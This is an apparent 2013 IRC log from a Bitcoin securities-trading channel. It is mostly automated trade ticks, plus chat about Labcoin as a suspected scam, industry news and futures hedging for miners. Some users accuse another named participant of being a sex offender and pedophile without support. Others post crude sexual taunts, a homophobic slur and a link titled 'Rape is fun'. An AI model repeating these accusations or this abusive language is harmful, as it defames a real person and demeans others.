3 @ 0.002132 = 0.0064 BTC [-] Aug 02 13:06:23 [BTCTC] [LABCOIN] 166 @ 0.00212 = 0.3519 BTC [-] Aug 02 13:06:24 [BTCTC] [LABCOIN] 500 @ 0.002119 = 1.0595 BTC [-] Aug 02 13:06:25 [BTCTC] [LABCOIN] 500 @ 0.002119 = 1.0595 BTC [-] Aug 02 13:06:26 [BTCTC] [LABCOIN] 65 @ 0.002118 = 0.1377 BTC [-] Aug 02 13:06:28 [BTCTC] [LABCOIN] 390 @ 0.002117 = 0.8256 BTC [-] Aug 02 13:06:28 [BTCTC] [LABCOIN] 166 @ 0.002111 = 0.3504 BTC [-] Aug 02 13:06:29 [BTCTC] [LABCOIN] 4 @ 0.002111 = 0.0084 BTC [-] Aug 02 13:06:30 [BTCTC] [LABCOIN] 1000 @ 0.00211 = 2.11 BTC [-] Aug 02 13:06:31 [BTCTC] [LABCOIN] 1 @ 0.002106 BTC [-] Aug 02 13:06:32 [BTCTC] [LABCOIN] 10 @ 0.002105 = 0.0211 BTC [-] Aug 02 13:06:33 [BTCTC] [LABCOIN] 166 @ 0.002101 = 0.3488 BTC [-] Aug 02 13:06:34 [BTCTC] [LABCOIN] 1000 @ 0.0021 = 2.1 BTC [-] Aug 02 13:06:35 [BTCTC] [LABCOIN] 163 @ 0.002098 = 0.342 BTC [-] Aug 02 13:06:36 [BTCTC] [LABCOIN] 978 @ 0.002097 = 2.0509 BTC [-] Aug 02 13:06:38 [BTCTC] [LABCOIN] 200 @ 0.002051 = 0.4102 BTC [-] Aug 02 13:06:38 [BTCTC] [LABCOIN] 200 @ 0.00205 = 0.41 BTC [-] Aug 02 13:06:39 [BTCTC] [LABCOIN] 1000 @ 0.00205 = 2.05 BTC [-] Aug 02 13:06:40 [BTCTC] [LABCOIN] 83 @ 0.002034 = 0.1688 BTC [-] Aug 02 13:06:41 [BTCTC] [LABCOIN] 500 @ 0.002033 = 1.0165 BTC [-] Aug 02 13:06:42 [BTCTC] [LABCOIN] 166 @ 0.002026 = 0.3363 BTC [-] Aug 02 13:06:43 [BTCTC] [LABCOIN] 1000 @ 0.002025 = 2.025 BTC [-] Aug 02 13:06:44 [BTCTC] [LABCOIN] 33 @ 0.002006 = 0.0662 BTC [-] Aug 02 13:06:45 [BTCTC] [LABCOIN] 200 @ 0.002005 = 0.401 BTC [-] Aug 02 13:07:36 [BTCTC] [TAT.ASICMINER] 32 @ 0.0412 = 1.3184 BTC [-] Aug 02 13:07:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.0412 BTC [-] Aug 02 13:07:39 [BTCTC] [TAT.ASICMINER] 11 @ 0.0412 = 0.4532 BTC [-] Aug 02 13:07:39 [BTCTC] [TAT.ASICMINER] 30 @ 0.0411 = 1.233 BTC [-] Aug 02 13:07:53 [BTCTC] [LABCOIN] 498 @ 0.002003 = 0.9975 BTC [-] Aug 02 13:07:54 [BTCTC] [LABCOIN] 700 @ 0.002002 = 1.4014 BTC [-] Aug 02 13:07:55 [BTCTC] [LABCOIN] 1302 @ 0.002002 = 2.6066 BTC [-] Aug 02 13:10:52 [BTCTC] [DMS.MINING] 7 @ 0.0091 = 0.0637 BTC [-] Aug 02 13:10:54 [BTCTC] [DMS.MINING] 80 @ 0.00911 = 0.7288 BTC [+] Aug 02 13:11:14 original content diggers All rights reserved Please indicate the source, declined plagiarism plagiarism. Aug 02 13:11:58 oh, google. Aug 02 13:12:59 [BTCTC] [TAT.ASICMINER] 26 @ 0.04023 = 1.046 BTC [-] Aug 02 13:13:06 anonce say wut ? Aug 02 13:14:13 [BTCTC] [LABCOIN] 1 @ 0.00228 BTC [+] Aug 02 13:16:26 [BTCTC] [LABCOIN] 13 @ 0.002006 = 0.0261 BTC [-] Aug 02 13:16:28 [BTCTC] [LABCOIN] 80 @ 0.002005 = 0.1604 BTC [-] Aug 02 13:16:29 [BTCTC] [LABCOIN] 16 @ 0.002004 = 0.0321 BTC [-] Aug 02 13:16:30 [BTCTC] [LABCOIN] 100 @ 0.002003 = 0.2003 BTC [-] Aug 02 13:16:31 [BTCTC] [LABCOIN] 380 @ 0.002002 = 0.7608 BTC [-] Aug 02 13:16:32 [BTCTC] [LABCOIN] 4000 @ 0.002001 = 8.004 BTC [-] Aug 02 13:16:33 [BTCTC] [LABCOIN] 10 @ 0.002 = 0.02 BTC [-] Aug 02 13:16:34 [BTCTC] [LABCOIN] 3827 @ 0.002 = 7.654 BTC [-] Aug 02 13:17:10 [BTCTC] [LABCOIN] 1173 @ 0.002 = 2.346 BTC [-] Aug 02 13:17:12 [BTCTC] [LABCOIN] 138 @ 0.002 = 0.276 BTC [-] Aug 02 13:18:58 [BTCTC] [BTCGARDEN] 1319 @ 0.016 = 21.104 BTC [+] Aug 02 13:25:33 [BTCTC] [LABCOIN] 70 @ 0.002005 = 0.1404 BTC [+] Aug 02 13:25:35 [BTCTC] [LABCOIN] 862 @ 0.002 = 1.724 BTC [-] Aug 02 13:25:36 [BTCTC] [LABCOIN] 1268 @ 0.00199 = 2.5233 BTC [-] Aug 02 13:30:45 [BTCTC] [DMS.MINING] 3 @ 0.00915 = 0.0275 BTC [+] Aug 02 13:32:03 [MPEX] [S.MPOE] 11812 @ 0.00082193 = 9.7086 BTC [+] Aug 02 13:33:25 [BTCTC] [BTCGARDEN] 250 @ 0.016 = 4 BTC [+] Aug 02 13:35:35 [HAVELOCK] [SMG] 75 @ 0.00026699 = 0.02 BTC [-] Aug 02 13:39:16 [BTCTC] [ACTIVEMINING] 15 @ 0.005929 = 0.0889 BTC [-] Aug 02 13:41:53 [BTCTC] [LABCOIN] 40 @ 0.002185 = 0.0874 BTC [+] Aug 02 13:42:30 [BTCTC] [LABCOIN] 2 @ 0.002185 = 0.0044 BTC [+] Aug 02 13:43:21 Labcoin seems to have issued the last 3mil shares they were keeping for themselves Aug 02 13:45:01 10 mil Aug 02 13:45:37 all signs point to scam Aug 02 13:45:52 when in doubt.... Aug 02 13:45:56 i'm actually betting that they will run by monday Aug 02 13:46:05 LOL profit taking and then buying back in after the crash? sounds legit Aug 02 13:46:26 ThickAsThieves prolly should have a bettingpool going Aug 02 13:46:30 [BTCTC] [BTCGARDEN] 63 @ 0.016 = 1.008 BTC [+] Aug 02 13:46:47 [BTCTC] [TAT.ASICMINER] 35 @ 0.04028 = 1.4098 BTC [+] Aug 02 13:46:49 they sold at least 7k btc Aug 02 13:47:08 then issued 3000more Aug 02 13:47:32 [BTCTC] [BITVPS] 645 @ 0.001522 = 0.9817 BTC [-] Aug 02 13:47:33 [BTCTC] [BITVPS] 250 @ 0.001523 = 0.3808 BTC [+] Aug 02 13:47:36 so somehow 2-day-old IPO announcement gets 7-10k in sales Aug 02 13:47:51 2day old fake ipo run by nobody. Aug 02 13:48:17 i'm interested in the vetting process to let someone ask for that much Aug 02 13:48:32 yes Aug 02 13:48:54 you'd think Aug 02 13:48:59 but in btc who knows Aug 02 13:49:16 the behavior is just like new altcoins Aug 02 13:49:21 people know they are scams Aug 02 13:49:23 and they love it Aug 02 13:49:23 vetting process is "what % of the loot do i get" Aug 02 13:50:24 [HAVELOCK] [SMG] 20 @ 0.00026699 = 0.0053 BTC [-] Aug 02 13:50:51 butbutbut..i'ts only a game Aug 02 13:52:18 yeah. but it's a different game than this shit. Aug 02 13:53:00 i was ironic :) Aug 02 13:53:01 listen guys, yer all just butthurt at BTCT and Labcoins success. If you wanna make a lot of money, maybe you should go out and make something of yourselves like them. Aug 02 13:53:19 too late for me, Aug 02 13:53:30 lol Aug 02 13:54:14 burnside appears to be quite motivated lately in developing the site Aug 02 13:54:23 he made new categories Aug 02 13:54:30 https://btct.co/security Aug 02 13:54:33 BTC-TC: BTC Trading Corp - View Security Aug 02 13:54:37 Scams go at the top Aug 02 13:55:09 it wasn't going anywhere in the first place. Aug 02 13:55:14 now it's pretty much dead. Aug 02 13:55:31 heh. when he finally finds time for IDIFF, i'm interested where that goes Aug 02 13:56:06 why is Namworld's a loan, but Deprived's a bond Aug 02 13:56:14 longer text? Aug 02 13:58:48 mircea_popescu: let's aim for this http://www.businessinsider.com/best-games-for-professional-gamers-2013-8 Aug 02 13:59:12 bitcoin not mentioned Aug 02 13:59:46 prolly cuz we have no professionals hiar :DDD Aug 02 14:02:46 ;;nethash Aug 02 14:02:48 296229.114335 Aug 02 14:05:23 [BTCTC] [BTCGARDEN] 260 @ 0.016 = 4.16 BTC [+] Aug 02 14:06:36 [HAVELOCK] [SMG] 41 @ 0.0002676 = 0.011 BTC [+] Aug 02 14:06:39 [BTCTC] [BTCGARDEN] 40 @ 0.016 = 0.64 BTC [+] Aug 02 14:06:42 heh Aug 02 14:08:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.04166 BTC [+] Aug 02 14:09:28 [BTCTC] [LABCOIN] 20 @ 0.002001 = 0.04 BTC [-] Aug 02 14:09:29 [BTCTC] [LABCOIN] 1000 @ 0.002001 = 2.001 BTC [-] Aug 02 14:09:31 [BTCTC] [LABCOIN] 1600 @ 0.002001 = 3.2016 BTC [-] Aug 02 14:09:32 [BTCTC] [LABCOIN] 49 @ 0.002 = 0.098 BTC [-] Aug 02 14:09:32 [BTCTC] [LABCOIN] 7853 @ 0.002 = 15.706 BTC [-] Aug 02 14:10:53 [BTCTC] [RSM] 51 @ 0.01251 = 0.638 BTC [-] Aug 02 14:10:55 [BTCTC] [RSM] 10 @ 0.01251 = 0.1251 BTC [-] Aug 02 14:10:57 [BTCTC] [RSM] 9 @ 0.01136 = 0.1022 BTC [-] Aug 02 14:12:13 [BTCTC] [ACTIVEMINING] 25 @ 0.006105 = 0.1526 BTC [+] Aug 02 14:12:14 [BTCTC] [ACTIVEMINING] 75 @ 0.006106 = 0.458 BTC [+] Aug 02 14:12:16 [BTCTC] [ACTIVEMINING] 1656 @ 0.006108 = 10.1148 BTC [+] Aug 02 14:12:17 [BTCTC] [ACTIVEMINING] 50 @ 0.006117 = 0.3059 BTC [+] Aug 02 14:12:18 [BTCTC] [ACTIVEMINING] 564 @ 0.006175 = 3.4827 BTC [+] Aug 02 14:12:50 [BTCTC] [ACTIVEMINING] 25 @ 0.006174 = 0.1544 BTC [-] Aug 02 14:12:51 [BTCTC] [ACTIVEMINING] 9 @ 0.006175 = 0.0556 BTC [+] Aug 02 14:13:30 lol kawa doody for fps Aug 02 14:13:32 what a joke Aug 02 14:13:47 you can't fps at an elite level on a console Aug 02 14:14:31 [HAVELOCK] [SDSTM] 3 @ 0.00789 = 0.0237 BTC [-] Aug 02 14:17:03 [HAVELOCK] [LABCO] 100 @ 0.0025 = 0.25 BTC [+] Aug 02 14:17:34 [HAVELOCK] [SDSTM] 31 @ 0.00789 = 0.2446 BTC [-] Aug 02 14:17:37 [HAVELOCK] [AM100] 2 @ 0.038 = 0.076 BTC [+] Aug 02 14:17:57 [HAVELOCK] [SDSTM] 7 @ 0.00777 = 0.0544 BTC [-] Aug 02 14:18:31 [HAVELOCK] [SDSTM] 7 @ 0.00763 = 0.0534 BTC [-] Aug 02 14:18:39 [HAVELOCK] [SDSTM] 3 @ 0.00763 = 0.0229 BTC [-] Aug 02 14:18:47 [HAVELOCK] [SDSTM] 52 @ 0.00762002 = 0.3962 BTC [-] Aug 02 14:18:54 [BTCTC] [ASICMINER-PT] 1 @ 4.075 BTC [-] Aug 02 14:19:05 [HAVELOCK] [LABCO] 100 @ 0.0025 = 0.25 BTC [+] Aug 02 14:19:35 [HAVELOCK] [SDSTM] 100 @ 0.00762002 = 0.762 BTC [-] Aug 02 14:20:07 [HAVELOCK] [AM100] 1 @ 0.0376 BTC [-] Aug 02 14:21:21 jurov i am. Aug 02 14:21:41 kidkrypto ha! i suspect you have a point. Aug 02 14:22:31 it's not a point, it's a fact Aug 02 14:22:41 [BTCTC] [BTCGARDEN] 200 @ 0.016 = 3.2 BTC [+] Aug 02 14:22:47 halo and cod faggots get their asses kicked by pc gamers Aug 02 14:23:11 im just going on how all the fps freaks i know play on a pc. Aug 02 14:23:19 ianae. Aug 02 14:23:33 ;;bcstats Aug 02 14:23:40 [BTCTC] [BTCGARDEN] 318 @ 0.016 = 5.088 BTC [+] Aug 02 14:23:42 Current Blocks: 249787 | Current Difficulty: 3.125696072776893E7 | Next Difficulty At Block: 249983 | Next Difficulty In: 196 blocks | Next Difficulty In About: 1 day, 2 hours, 16 minutes, and 45 seconds | Next Difficulty Estimate: 36848763.6958 | Estimated Percent Change: 17.88978 Aug 02 14:24:51 jurov anyway, nice to see business insider is finally finding its own level. Aug 02 14:25:29 the relationship between businessman and professional gamer is roughly comensurate with the relationship between business journalism and business insider Aug 02 14:25:55 [HAVELOCK] [LABCO] 3 @ 0.0025 = 0.0075 BTC [+] Aug 02 14:27:01 [HAVELOCK] [LABCO] 5 @ 0.0025 = 0.0125 BTC [+] Aug 02 14:28:29 [BTCTC] [BTCGARDEN] 666 @ 0.016 = 10.656 BTC [+] Aug 02 14:30:45 [MPEX] [S.MPOE] 2966 @ 0.00082193 = 2.4378 BTC [+] Aug 02 14:30:47 [MPEX] [S.MPOE] 5000 @ 0.00082195 = 4.1098 BTC [+] Aug 02 14:30:56 [MPEX] [S.MPOE] 6268 @ 0.00082196 = 5.152 BTC [+] Aug 02 14:30:58 [MPEX] [S.MPOE] 1200 @ 0.0008224 = 0.9869 BTC [+] Aug 02 14:31:02 [MPEX] [S.MPOE] 476 @ 0.00082289 = 0.3917 BTC [+] Aug 02 14:31:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.04163 BTC [-] Aug 02 14:32:51 [HAVELOCK] [AM100] 3 @ 0.03760008 = 0.1128 BTC [+] Aug 02 14:33:44 where is that smelly tramp mircea_popescu Aug 02 14:33:54 I've a bone to pick with him Aug 02 14:34:04 [HAVELOCK] [LABCO] 3 @ 0.00245555 = 0.0074 BTC [-] Aug 02 14:34:19 [BTCTC] [ACTIVEMINING] 25 @ 0.005966 = 0.1492 BTC [-] Aug 02 14:34:21 [BTCTC] [ACTIVEMINING] 18 @ 0.005965 = 0.1074 BTC [-] Aug 02 14:34:22 [BTCTC] [ACTIVEMINING] 50 @ 0.005964 = 0.2982 BTC [-] Aug 02 14:34:23 [BTCTC] [ACTIVEMINING] 1 @ 0.005928 BTC [-] Aug 02 14:34:24 [BTCTC] [ACTIVEMINING] 50 @ 0.005918 = 0.2959 BTC [-] Aug 02 14:34:26 [BTCTC] [ACTIVEMINING] 200 @ 0.005917 = 1.1834 BTC [-] Aug 02 14:34:27 [BTCTC] [ACTIVEMINING] 12 @ 0.005901 = 0.0708 BTC [-] Aug 02 14:34:28 mircea_popescu; show yourself Aug 02 14:34:28 [BTCTC] [ACTIVEMINING] 50 @ 0.0059 = 0.295 BTC [-] Aug 02 14:34:29 [BTCTC] [ACTIVEMINING] 667 @ 0.005843 = 3.8973 BTC [-] Aug 02 14:34:29 [BTCTC] [ACTIVEMINING] 1708 @ 0.005842 = 9.9781 BTC [-] Aug 02 14:34:54 [BTCTC] [ACTIVEMINING] 25 @ 0.005841 = 0.146 BTC [-] Aug 02 14:34:56 [BTCTC] [ACTIVEMINING] 76 @ 0.00584 = 0.4438 BTC [-] Aug 02 14:35:26 ;;later tell mircea_popescu: are you registered sex offender? Aug 02 14:35:31 The operation succeeded. Aug 02 14:36:26 snapeweasley: no your mom was willing Aug 02 14:36:40 and tell your sister mircea_popescu Aug 02 14:36:43 pervert Aug 02 14:38:17 "The Labcoin passthru will be maintained and operated by Havelock Investments. Havelock Investments has not performed any due diligence on the underlying asset and individuals involved in managing Labcoin." Aug 02 14:38:39 [HAVELOCK] [SMG] 350 @ 0.000239 = 0.0837 BTC [-] Aug 02 14:38:40 I wonder why labcoin Aug 02 14:38:41 [HAVELOCK] [SMG] 140 @ 0.000239 = 0.0335 BTC [-] Aug 02 14:38:43 [HAVELOCK] [SMG] 212 @ 0.000239 = 0.0507 BTC [-] Aug 02 14:38:44 reassuring Aug 02 14:39:20 [HAVELOCK] [SDSTM] 2 @ 0.00762002 = 0.0152 BTC [-] Aug 02 14:39:30 so it's a 1:1 PT but it takes 5% over dividends Aug 02 14:39:38 not sure what's the point Aug 02 14:39:45 oh well, it's not like there will be dividends :p Aug 02 14:39:47 what do you mean Aug 02 14:39:55 Seems more stable Aug 02 14:39:59 [HAVELOCK] [SMG] 14 @ 0.000267 = 0.0037 BTC [+] Aug 02 14:40:19 [BTCTC] [LABCOIN] 20 @ 0.002006 = 0.0401 BTC [+] Aug 02 14:40:21 [BTCTC] [LABCOIN] 500 @ 0.002005 = 1.0025 BTC [-] Aug 02 14:40:22 [BTCTC] [LABCOIN] 1 @ 0.002002 BTC [-] Aug 02 14:40:23 [BTCTC] [LABCOIN] 2060 @ 0.002001 = 4.1221 BTC [-] Aug 02 14:40:26 [HAVELOCK] [LABCO] 67 @ 0.0025 = 0.1675 BTC [+] Aug 02 14:41:27 [BTCTC] [BTCGARDEN] 61 @ 0.016 = 0.976 BTC [+] Aug 02 14:41:35 [HAVELOCK] [AM100] 2 @ 0.0376 = 0.0752 BTC [-] Aug 02 14:41:38 [HAVELOCK] [SDSTM] 15 @ 0.00762002 = 0.1143 BTC [-] Aug 02 14:41:42 [BTCTC] [COGNITIVE] 3 @ 0.465 = 1.395 BTC [+] Aug 02 14:42:36 [HAVELOCK] [LABCO] 45 @ 0.0025 = 0.1125 BTC [+] Aug 02 14:42:44 snapeweasley!*@* added to ignore list. Aug 02 14:42:59 ThickAsThieves what the fuck sense does that even make. Aug 02 14:43:50 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 02 14:43:56 [HAVELOCK] [SMG] 5 @ 0.000267 = 0.0013 BTC [+] Aug 02 14:44:01 [BTCTC] [KENILWORTH] 500 @ 0.001799 = 0.8995 BTC [-] Aug 02 14:44:45 [BTCTC] [ASICMINER-PT] 2 @ 4.149 = 8.298 BTC [+] Aug 02 14:45:07 [HAVELOCK] [AM100] 1 @ 0.0388888 BTC [+] Aug 02 14:46:30 [HAVELOCK] [AM100] 1 @ 0.0376 BTC [-] Aug 02 14:46:39 [HAVELOCK] [AM100] 1 @ 0.0375 BTC [-] Aug 02 14:46:45 [HAVELOCK] [AM100] 1 @ 0.0375 BTC [-] Aug 02 14:48:40 [BTCTC] [BTCGARDEN] 505 @ 0.016 = 8.08 BTC [+] Aug 02 14:50:14 [BTCTC] [MIRCEA_NONCE] 99999999 @ 0.00016 = 978.08 BTC [+] Aug 02 14:50:42 wait. what ?! Aug 02 14:51:21 [BTCTC] [TAT.ASICMINER] 12 @ 0.04161 = 0.4993 BTC [-] Aug 02 14:52:04 [BTCTC] [MIRCEA_POOPYSCOOP] 49 @ 0.0056 = 318.14 BTC [+] Aug 02 14:52:14 [BTCTC] [LABCOIN] 20 @ 0.002003 = 0.0401 BTC [+] Aug 02 14:52:15 [BTCTC] [LABCOIN] 50 @ 0.002002 = 0.1001 BTC [-] Aug 02 14:52:17 [BTCTC] [LABCOIN] 4930 @ 0.002 = 9.86 BTC [-] Aug 02 14:52:25 [BTCTC] [DMS.MINING] 40 @ 0.00914 = 0.3656 BTC [-] Aug 02 14:53:34 [MPCP] [MONEYPAK_POOPERSCOOPER] 40 @ 0.00914 = 0.2656 BTC [-] Aug 02 14:53:45 okay Aug 02 14:53:53 mircea registerd sex offender in cluj Aug 02 14:54:06 lol Aug 02 14:54:16 ascbot there's no such thing in romania dummy. Aug 02 14:54:22 napoca Aug 02 14:54:35 [BTCTC] [BTCGARDEN] 317 @ 0.016 = 5.072 BTC [+] Aug 02 14:54:51 i know about your sick hobbies Aug 02 14:55:20 [BTCTC] [LABCOIN] 518 @ 0.002128 = 1.1023 BTC [+] Aug 02 14:55:30 [BTCTC] [DMS.MINING] 8 @ 0.009149 = 0.0732 BTC [+] Aug 02 14:55:30 [BTCTC] [DMS.MINING] 192 @ 0.00915 = 1.7568 BTC [+] Aug 02 14:55:53 ascbot http://trilema.com/2010/nsfw-mosu-cu-joarda/ Aug 02 14:55:57 go read trilema and stfu. Aug 02 14:56:22 oh shit, now I want to read romanian Aug 02 14:56:35 [BTCTC] [DMS.MINING] 25 @ 0.00915 = 0.2288 BTC [+] Aug 02 14:56:42 mircea_popescu: wow a P.I.M.P Aug 02 14:56:51 are they not a little old for your taste? Aug 02 14:57:25 pankkake it's basically mocking some romanian blogger who came up with this idea that "everyone on the internet steals, there's no blogger doing his own photography" Aug 02 14:57:54 [BTCTC] [ASICMINER-PT] 1 @ 4.149 BTC [+] Aug 02 14:57:56 romanians are no stranger to stealing Aug 02 14:57:56 so i'm all "o just my luck, i found on google this pic of my own girls in my own livingroom, fancy the good fortune" Aug 02 14:58:27 [BTCTC] [ASICMINER-PT] 2 @ 4.064 = 8.128 BTC [-] Aug 02 14:58:39 must of been exciting for you, did they suck your wee wee? Aug 02 14:59:41 ascbot no, they just spent their whole time attentionwhoring on irc. Aug 02 14:59:49 what is a pankkake? It sounds like a bukaki pancake Aug 02 14:59:52 [BTCTC] [LABCOIN] 404 @ 0.002126 = 0.8589 BTC [-] Aug 02 15:00:02 [HAVELOCK] [SDSTM] [PAID] 2.00000000 BTC to 100`000 shares, 2000 satoshi per share Aug 02 15:00:31 hah Aug 02 15:01:57 well, that's the idea :p Aug 02 15:02:04 mircea_popescu: you think it will be possible to travel to you and give these 2 wenches a popescu special with a stick? Aug 02 15:02:15 teach me your ways pimp master Aug 02 15:02:25 either a woman with pancakes on her head, or a pancake with… Aug 02 15:02:57 mircea: i have read also 50 shades of grey and i have litle stock of litecoins, although i am not so rich as you and i do not have the connections you do Aug 02 15:03:30 that's nice. Aug 02 15:03:36 if there's an opening i'll let you know. Aug 02 15:03:50 mircea_popescu: thanks so much, i can't wait to live life like you Aug 02 15:03:58 making it rain on those hoes Aug 02 15:04:05 real g shit Aug 02 15:04:23 over 18 only mind mircea_popescu Aug 02 15:04:34 i am not as daring as you :P Aug 02 15:05:01 ascbot, do you take it in ass? Aug 02 15:05:07 never Aug 02 15:05:15 you will ;) Aug 02 15:05:22 no Aug 02 15:05:50 mircea_popescu: how much you paid for the childrens last time? Aug 02 15:05:56 [HAVELOCK] [LABCO] 1 @ 0.0025 BTC [+] Aug 02 15:06:03 how do i end up with all the esl retards Aug 02 15:06:12 ascbot children is a plural already. Aug 02 15:06:15 I know about your sordid history Aug 02 15:06:24 underage relations Aug 02 15:06:37 did you pay them in bitcoins? Aug 02 15:06:45 my sordid history consists of me ruining scammers' life and they coming here to herpderp Aug 02 15:06:58 "We’re excited to announce the Bitcoin Foundation’s grant award winner for the second quarter of 2013: Coinpunk" Aug 02 15:07:02 scammer is better than ped0 any day of the week Aug 02 15:07:04 http://coinpunk.org/ Aug 02 15:07:07 Coinpunk Aug 02 15:07:18 run your own wallet service Aug 02 15:07:26 not such a bad idea. Aug 02 15:08:15 how have you managed to escape without being behind bars? Aug 02 15:08:48 [BTCTC] [BTCGARDEN] 290 @ 0.016 = 4.64 BTC [+] Aug 02 15:08:50 not a bat idea... but ruby :( Aug 02 15:08:50 ascbot!*@* added to ignore list. Aug 02 15:08:56 night Aug 02 15:08:57 cryptothug got approved too yeh? Aug 02 15:09:12 http://online.wsj.com/article/SB10001424127887323997004578641993388259674.html?mod=WSJ_Tech_LEFTTopNews Aug 02 15:09:18 FBI Taps Hacker Tactics to Spy on Suspects - WSJ.com Aug 02 15:10:08 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 02 15:10:27 [BTCTC] [LABCOIN] 1000 @ 0.002144 = 2.144 BTC [+] Aug 02 15:10:29 [BTCTC] [LABCOIN] 200 @ 0.002145 = 0.429 BTC [+] Aug 02 15:10:54 [BTCTC] [LABCOIN] 500 @ 0.00213 = 1.065 BTC [-] Aug 02 15:11:15 [HAVELOCK] [LABCO] 97 @ 0.00245555 = 0.2382 BTC [-] Aug 02 15:11:17 [HAVELOCK] [LABCO] 15 @ 0.00245101 = 0.0368 BTC [-] Aug 02 15:11:19 [HAVELOCK] [LABCO] 50 @ 0.002451 = 0.1226 BTC [-] Aug 02 15:11:21 [HAVELOCK] [LABCO] 200 @ 0.00245 = 0.49 BTC [-] Aug 02 15:11:23 [HAVELOCK] [LABCO] 838 @ 0.00235 = 1.9693 BTC [-] Aug 02 15:12:09 [BTCTC] [LABCOIN] 1652 @ 0.002144 = 3.5419 BTC [+] Aug 02 15:12:19 [BTCTC] [LABCOIN] 400 @ 0.002145 = 0.858 BTC [+] Aug 02 15:13:05 http://trilema.com/2013/rape-is-fun-or-lets-fuck-up-adria-richards/ ♥ Aug 02 15:13:07 Rape is fun, or let’s fuck up Adria Richards pe Trilema - Un blog de Mircea Popescu. Aug 02 15:13:42 [BTCTC] [DMS.MINING] 150 @ 0.00915 = 1.3725 BTC [+] Aug 02 15:13:44 [BTCTC] [DMS.MINING] 450 @ 0.0092 = 4.14 BTC [+] Aug 02 15:13:54 mircea_popescu: so how the fuck does the credit system on your blog work? Aug 02 15:13:57 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 02 15:14:16 you send some btc dust and get a pw Aug 02 15:14:56 somehow I only get a romanian page, not very helpful Aug 02 15:15:46 http://www.coindesk.com/data-reveals-plans-to-get-us-government-states-and-banks-on-board-with-virtual-currency/ Aug 02 15:15:48 DATA reveals plans to get US government, states and banks on board with virtual currency Aug 02 15:16:09 "Choi is the general counsel at Payward, the company behind the Kraken bitcoin trading platform. She conceived the idea for an SRO with Stan Stalnaker, the founder of Hub Culture, a social networking service that operates the Ven virtual currency." Aug 02 15:16:26 fail Aug 02 15:16:45 VanCleef well it's good for a few pseudo-trade press articles. Aug 02 15:16:50 I see nothing of this SRO discussing securities at all Aug 02 15:17:27 "The list of backers is a Who’s Who of players in bitcoin. Tony Gallipi, CEO of payment processor BitPay, Chris Larsen, CEO of Ripple and founder of OpenCoin, and Patrick Murck, general counsel for the Bitcoin Foundation, are on board. TradeHill CEO Jered Kenna,who has been negotiating licenses with individual states for his high-net worth bitcoin exchange, is also a member." Aug 02 15:18:20 isn't bitcoin still in beta? Aug 02 15:18:28 two scammers and a confused fuck. sounds like it'll work great. Aug 02 15:18:35 lol Aug 02 15:18:54 [BTCTC] [DMS.MINING] 1 @ 0.0093 BTC [+] Aug 02 15:18:55 [BTCTC] [DMS.MINING] 4 @ 0.009435 = 0.0377 BTC [+] Aug 02 15:19:25 [BTCTC] [PAJKA.BOND] 40 @ 0.02697 = 1.0788 BTC [+] Aug 02 15:19:55 [BTCTC] [ACTIVEMINING] 25 @ 0.006041 = 0.151 BTC [+] Aug 02 15:19:57 http://www.coindesk.com/charlie-shrem-to-banks-we-want-to-work-with-you/ Aug 02 15:19:58 BitInstant CEO Charlie Shrem to banks: "We want to work with you" Aug 02 15:20:06 lick lick Aug 02 15:23:02 jp morgan owns it now Aug 02 15:23:13 [HAVELOCK] [AM100] 2 @ 0.0388888 = 0.0778 BTC [+] Aug 02 15:23:44 [MPEX] [S.MPOE] 5950 @ 0.00082077 = 4.8836 BTC [-] Aug 02 15:24:02 "ASICMINER is absolutely a very solid and proven company, unfortunately they are also valued as such. " Aug 02 15:24:16 reddit investing Aug 02 15:24:16 30% yield Aug 02 15:24:24 still undervalued Aug 02 15:24:35 [MPEX] [S.MPOE] 6850 @ 0.00082077 = 5.6223 BTC [-] Aug 02 15:24:37 [MPEX] [S.MPOE] 4250 @ 0.0008182 = 3.4774 BTC [-] Aug 02 15:24:45 need to stop draggin new world ideas and innovations into the mess of thhe old world and the useless dinosaurs, need to ignore the old world and keep our heads down and keep going, the internet is here, grow up Aug 02 15:24:56 matuszed: arguably yes, but it's the risky world of bitcoin mining Aug 02 15:25:23 Understood. But if i want BTC yield its the safest game in town and still high Aug 02 15:25:39 THe long bond pays ~3 Aug 02 15:25:44 in USD land Aug 02 15:25:54 of course Aug 02 15:27:38 [BTCTC] [LABCOIN] 848 @ 0.002144 = 1.8181 BTC [-] Aug 02 15:27:40 [BTCTC] [LABCOIN] 152 @ 0.002011 = 0.3057 BTC [-] Aug 02 15:28:13 [HAVELOCK] [AM100] 2 @ 0.0389 = 0.0778 BTC [+] Aug 02 15:28:40 [HAVELOCK] [SDSTM] 2 @ 0.00838 = 0.0168 BTC [+] Aug 02 15:29:07 [HAVELOCK] [SMG] 14 @ 0.00026599 = 0.0037 BTC [-] Aug 02 15:30:38 [BTCTC] [BASIC-MINING] 1 @ 0.45 BTC [-] Aug 02 15:31:20 http://thegenesisblock.com/hedging-bitcoin-mining-investments-with-network-difficulty-futures-part-1-hedging-shipment-delay/ Aug 02 15:31:22 Hedging Bitcoin Mining Investments with Network Difficulty Futures: Part 1 - Hedging Shipment Delay Aug 02 15:31:56 A liquid difficulty futures exchange would really help the mining community Aug 02 15:31:59 i'm into that thickasthieves Aug 02 15:32:55 [HAVELOCK] [AM100] 5 @ 0.0389 = 0.1945 BTC [+] Aug 02 15:34:30 [BTCTC] [BASIC-MINING] 2 @ 0.4697 = 0.9394 BTC [+] Aug 02 15:35:47 matuszed http://trilema.com/2012/further-futures-on-mpex/ Aug 02 15:36:02 sadlky miners don't understand futures. Aug 02 15:36:37 [HAVELOCK] [AM100] 2 @ 0.0389 = 0.0778 BTC [+] Aug 02 15:36:47 Its really their loss. The ones who can understand it will have a leg up Aug 02 15:37:52 my words exactly. Aug 02 15:38:23 [BTCTC] [ASICMINER-PT] 1 @ 4.08 BTC [+] Aug 02 15:39:38 http://trilema.com/2013/how-to-hedge-as-a-miner/ Aug 02 15:39:42 How to hedge as a miner pe Trilema - Un blog de Mircea Popescu. Aug 02 15:39:43 [HAVELOCK] [AM100] 2 @ 0.0388888 = 0.0778 BTC [-] Aug 02 15:39:55 i even made a long, simple explanation with many pictures Aug 02 15:40:00 mircea are you familar with xtrader? Aug 02 15:40:07 People love pictures Aug 02 15:40:09 but i guess bitcoin 